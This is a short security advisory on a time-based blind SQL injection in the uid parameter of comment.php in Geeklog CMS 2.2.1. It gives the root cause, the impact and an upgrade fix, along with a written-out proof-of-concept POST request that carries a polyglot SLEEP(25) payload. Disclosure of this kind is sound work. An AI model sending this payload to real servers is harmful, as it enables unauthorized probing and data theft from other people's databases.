Geeklog 2.2.1 - Blind SQL Injection
Overview #
A Blind SQL Injection vulnerability exists in Geeklog CMS version 2.2.1. The vulnerability allows remote attackers to execute arbitrary SQL commands via the uid parameter in comment.php.
Vulnerability Details #
Affected Versions: 2.2.1 and earlier
Location: comment.php
Affected Parameter: uid
Root Cause: Insufficient input validation on the uid parameter allows SQL Injection attacks.
Exploitation Requirements #
- No authentication required
- Direct access to the comment endpoint
Impact #
Remote attackers can exploit this vulnerability to:
- Extract sensitive data from the database
- Bypass authentication mechanisms
- Modify or delete database content
Proof of Concept #
POST /geeklog-2.2.1/public_html/comment.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
uid=2+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/Time-based Blind SQL Injection: If the server response is delayed by 25 seconds, the target is vulnerable.
Solution #
Upgrade to a patched version of Geeklog that includes proper input sanitization and parameterized queries.